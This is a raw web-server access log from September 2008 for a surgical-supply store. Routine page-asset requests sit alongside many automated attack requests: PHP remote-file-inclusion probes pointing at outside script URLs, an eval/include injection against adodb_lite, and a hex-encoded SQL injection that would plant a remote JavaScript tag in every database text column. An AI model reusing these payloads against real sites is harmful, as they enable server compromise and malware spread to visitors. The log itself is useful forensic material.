62.47.129.79 - - [09/Sep/2008:01:39:49 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:39:50 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:39:52 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:39:54 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:39:55 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:40:00 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:40:01 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:40:03 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:40:06 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:40:07 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:40:12 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:40:13 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:40:15 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:40:16 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:40:19 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:40:23 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:40:25 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/conventions.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:40:26 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/conventions.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:40:29 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:40:29 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:40:33 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:40:34 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:40:36 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:41:09 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
62.47.129.79 - - [09/Sep/2008:01:41:09 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
59.126.46.141 - - [09/Sep/2008:01:41:12 -0400] "GET /logs/access_log.Q108071300//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://carolinegunawan.com/images/gid.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
61.47.10.168 - - [09/Sep/2008:01:42:13 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.konkurent.ru/poll/paddy?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
61.47.10.168 - - [09/Sep/2008:01:42:13 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.konkurent.ru/poll/paddy?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
61.47.10.168 - - [09/Sep/2008:01:42:14 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.konkurent.ru/poll/paddy?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
61.47.10.168 - - [09/Sep/2008:01:42:16 -0400] "GET ////index.php?DOCUMENT_ROOT=http://www.konkurent.ru/poll/paddy?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
61.47.10.168 - - [09/Sep/2008:01:42:16 -0400] "GET ////index.php?DOCUMENT_ROOT=http://www.konkurent.ru/poll/paddy?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
61.47.10.168 - - [09/Sep/2008:01:42:18 -0400] "GET ////index.php?DOCUMENT_ROOT=http://www.konkurent.ru/poll/paddy?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
61.47.10.168 - - [09/Sep/2008:01:42:20 -0400] "GET ////index.php?DOCUMENT_ROOT=http://www.konkurent.ru/poll/paddy?? HTTP/1.1" 404 210 "-" "libwww-perl/5.79"
61.47.10.168 - - [09/Sep/2008:01:42:28 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.konkurent.ru/poll/paddy?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
62.75.170.176 - - [09/Sep/2008:01:43:54 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/busk.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
62.75.170.176 - - [09/Sep/2008:01:43:56 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/busk.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
209.59.12.99 - - [09/Sep/2008:01:44:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.214.87.108 - - [09/Sep/2008:01:45:11 -0400] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.hotelsunflower.it/images/rhs/bot.txt?? HTTP/1.1" 404 219 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
85.214.87.108 - - [09/Sep/2008:01:45:11 -0400] "GET /joomla/index.php?option=com_restaurante&task=http://www.hotelsunflower.it/images/rhs/bot.txt?? HTTP/1.1" 404 214 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
200.93.147.155 - - [09/Sep/2008:01:46:06 -0400] "GET /logs/access_log.Q108061500/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
200.93.147.155 - - [09/Sep/2008:01:46:08 -0400] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
200.93.147.155 - - [09/Sep/2008:01:46:09 -0400] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
71.119.54.161 - - [09/Sep/2008:01:47:27 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/registration_grafting.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
71.119.54.161 - - [09/Sep/2008:01:47:27 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/registration_grafting.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
71.119.54.161 - - [09/Sep/2008:01:47:30 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/registration_grafting.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
71.119.54.161 - - [09/Sep/2008:01:47:30 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/registration_grafting.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
83.145.205.184 - - [09/Sep/2008:01:46:44 -0400] "GET /logs/error_log.Q108072200?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 442744 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
200.93.147.155 - - [09/Sep/2008:01:48:32 -0400] "GET /logs/access_log.Q108060700/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
83.145.205.184 - - [09/Sep/2008:01:46:44 -0400] "GET /logs/error_log.Q108072200?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 442744 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
121.135.142.207 - - [09/Sep/2008:01:48:42 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.ellinotopos.com/idv6.txt???? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
121.135.142.207 - - [09/Sep/2008:01:48:42 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.ellinotopos.com/idv6.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
121.135.142.207 - - [09/Sep/2008:01:48:42 -0400] "GET /logs/error_log.Q108082000//modules/TotalCalendar/about.php?inc_dir=http://www.ellinotopos.com/idv6.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
66.249.67.114 - - [09/Sep/2008:01:39:58 -0400] "GET /logs/access_log.Q108060600 HTTP/1.1" 200 3080021 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
59.126.46.141 - - [09/Sep/2008:01:49:03 -0400] "GET /logs/error_log.Q108071900//index.php?DOCUMENT_ROOT=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
59.126.46.141 - - [09/Sep/2008:01:49:06 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
59.126.46.141 - - [09/Sep/2008:01:49:10 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
200.93.147.155 - - [09/Sep/2008:01:49:13 -0400] "GET /logs/access_log.Q108052000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
200.93.147.155 - - [09/Sep/2008:01:49:15 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
200.93.147.155 - - [09/Sep/2008:01:49:15 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
209.59.12.99 - - [09/Sep/2008:01:49:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.135.142.207 - - [09/Sep/2008:01:49:31 -0400] "GET /logs/access_log.Q108082000//modules/TotalCalendar/about.php?inc_dir=http://www.ellinotopos.com/idv6.txt???? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
200.93.147.155 - - [09/Sep/2008:01:49:32 -0400] "GET /logs/access_log.Q108052300/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.805"
121.135.142.207 - - [09/Sep/2008:01:49:32 -0400] "GET /logs/error_log.Q108032600//modules/TotalCalendar/about.php?inc_dir=http://www.ellinotopos.com/idv6.txt???? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
59.126.46.141 - - [09/Sep/2008:01:49:37 -0400] "GET /logs/access_log.Q108082200//index.php?DOCUMENT_ROOT=http://www.seomen.com/amember/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
83.145.205.184 - - [09/Sep/2008:01:48:22 -0400] "GET /logs/error_log.Q108071800?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 506119 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
88.84.139.156 - - [09/Sep/2008:01:50:41 -0400] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/busk.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.84.139.156 - - [09/Sep/2008:01:50:41 -0400] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a=http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/extreme/busk.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
83.145.205.184 - - [09/Sep/2008:01:48:57 -0400] "GET /logs/error_log.Q108071800?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 506119 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
62.87.154.41 - - [09/Sep/2008:01:51:11 -0400] "GET /logs/config.php?path_to_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
62.87.154.41 - - [09/Sep/2008:01:51:11 -0400] "GET /config.php?path_to_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
62.87.154.41 - - [09/Sep/2008:01:51:13 -0400] "GET /logs/access_log.Q108081900%20/config.php?path_to_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
80.86.101.203 - - [09/Sep/2008:01:51:14 -0400] "GET /logs/error_log.Q108022500//claroline/tracking/userLog.php?rootSys=http://veldink.com/mine/osyrys_id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
80.86.101.203 - - [09/Sep/2008:01:51:14 -0400] "GET //claroline/tracking/userLog.php?rootSys=http://veldink.com/mine/osyrys_id.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
80.86.101.203 - - [09/Sep/2008:01:51:14 -0400] "GET /logs//claroline/tracking/userLog.php?rootSys=http://veldink.com/mine/osyrys_id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
80.86.101.203 - - [09/Sep/2008:01:51:17 -0400] "GET /logs/error_log.Q108060600//claroline/tracking/userLog.php?rootSys=http://veldink.com/mine/osyrys_id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
62.87.154.41 - - [09/Sep/2008:01:52:06 -0400] "GET /logs/config.php?path_to_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
62.87.154.41 - - [09/Sep/2008:01:52:06 -0400] "GET /logs/access_log.Q108081900%20/config.php?path_to_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
62.87.154.41 - - [09/Sep/2008:01:52:07 -0400] "GET /config.php?path_to_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
62.94.199.120 - - [09/Sep/2008:01:52:15 -0400] "GET /logs/access_log.Q108081300/modules/My_eGallery/index.php?basepath=http://www.sunter.us/a.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
62.94.199.120 - - [09/Sep/2008:01:52:20 -0400] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.sunter.us/a.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
67.19.87.58 - - [09/Sep/2008:01:52:41 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
67.19.87.58 - - [09/Sep/2008:01:52:41 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
67.19.87.58 - - [09/Sep/2008:01:52:41 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
62.87.154.41 - - [09/Sep/2008:01:52:43 -0400] "GET /logs/config.php?path_to_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
62.87.154.41 - - [09/Sep/2008:01:52:43 -0400] "GET /config.php?path_to_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
62.87.154.41 - - [09/Sep/2008:01:52:43 -0400] "GET /logs/access_log.Q108081900%20/config.php?path_to_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
67.19.87.58 - - [09/Sep/2008:01:52:45 -0400] "GET /logs/error_log.Q108081100//s_loadenv.inc.php?DOCUMENT_ROOT=http://alan-stone.com/images/stories/id.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
216.146.70.18 - - [09/Sep/2008:01:53:28 -0400] "GET /logs/access_log.Q108070500/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 284 "-" "libwww-perl/5.76"
216.146.70.18 - - [09/Sep/2008:01:53:28 -0400] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 257 "-" "libwww-perl/5.76"
216.146.70.18 - - [09/Sep/2008:01:53:28 -0400] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 262 "-" "libwww-perl/5.76"
216.146.70.18 - - [09/Sep/2008:01:53:29 -0400] "GET /logs/error_log.Q108070500/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.wspilots.com/modules/mx_pafiledb/pafiledb/images/id.txt???? HTTP/1.1" 404 283 "-" "libwww-perl/5.76"
62.87.154.41 - - [09/Sep/2008:01:54:10 -0400] "GET /logs/error_log.Q108071900/config.php?path_to_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
62.87.154.41 - - [09/Sep/2008:01:54:22 -0400] "GET /logs/access_log.Q108072300/config.php?path_to_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
209.59.12.99 - - [09/Sep/2008:01:54:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.87.154.41 - - [09/Sep/2008:01:55:07 -0400] "GET /logs/error_log.Q108071900/config.php?path_to_root=http://borneo.siteburg.com/error.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
